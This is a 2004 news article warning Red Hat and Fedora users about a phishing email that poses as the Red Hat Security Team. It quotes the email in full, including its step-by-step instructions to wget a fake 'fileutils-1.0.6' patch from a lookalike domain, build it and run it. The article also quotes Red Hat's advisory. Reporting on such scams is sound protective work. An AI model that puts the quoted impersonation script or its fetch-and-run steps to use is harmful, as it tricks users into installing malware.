---

New Phishing Expedition Targets Red Hat/Fedora Users

By Brian Proffitt
Managing Editor

It’s not often that someone tries launching a trojan attack on
Linux users, but earlier this weekend it appears that someone was
trying to do just that to Red Hat and Fedora Core users.

An e-mail message was sent to several Red Hat users over the
weekend, claiming to be from the RedHat [sic] Security
Team. The note warned recipients to download and install a patch
for fileutils-1.0.6, indicating that a vulnerability “could allow a
remote attacker to execute arbitrary code with root
privileges.”

The note was seen in the wild earlier this weekend, but it is
still being delivered. This reporter received the message as late
as 6:55 PM EDT today. The message arrived five times, and were all
delivered to my work account, which is not the account I use to
register products.

The content of the note, complete with Red Hat logo, tries to
tell a good tale, as seen below, but the spelling errors and the
improper From address are clues of the note’s false nature.

“Original issue date: October 20, 2004

“Last revised: October 20, 2004

“Source: RedHat

“A complete revision history is at the end of this file.

“Dear RedHat user,

“Redhat found a vulnerability in fileutils (ls and mkdir), that
could allow a remote attacker to execute arbitrary code with root
privileges. Some of the affected linux distributions include RedHat
7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE
2 and not only. It is known that *BSD and Solaris platforms are NOT
affected.

“The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch. This is a
critical-critical update that you must make by following these
steps:

  • “First download the patch from the Security RedHat
    mirror: wget
    www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
  • Untar the patch: tar zxvf
    fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

“Again, please apply this patch as soon as possible or you risk
your system and others` to be compromised.

“Thank you for your prompt attention to this serious matter,

RedHat Security Team…”

The domain fedora-redhat.com is part of a netblock owned by
Yahoo, according to Netcraft.com. It is not an official Red Hat
site.

The security team at Red Hat has already noted the existence of
the fake warning, and has posted this message, dated October 23, at
http://www.redhat.com/security/:

“Red Hat has been made aware that emails are circulating that
pretend to come from the Red Hat Security Team. These emails tell
users to download and run an update from a users home directory.
This fake update appears to contain malicious code. Official
messages from the Red Hat security team are never sent unsolicited,
are always sent from the address [email protected], and are
digitally signed by GPG. All official updates for Red Hat products
are digitally signed and should not be installed unless they are
correctly signed and the signature is verified…”

Red Hat and Fedora Core users are urged not to download or
install the software highlighted in this ficticious message.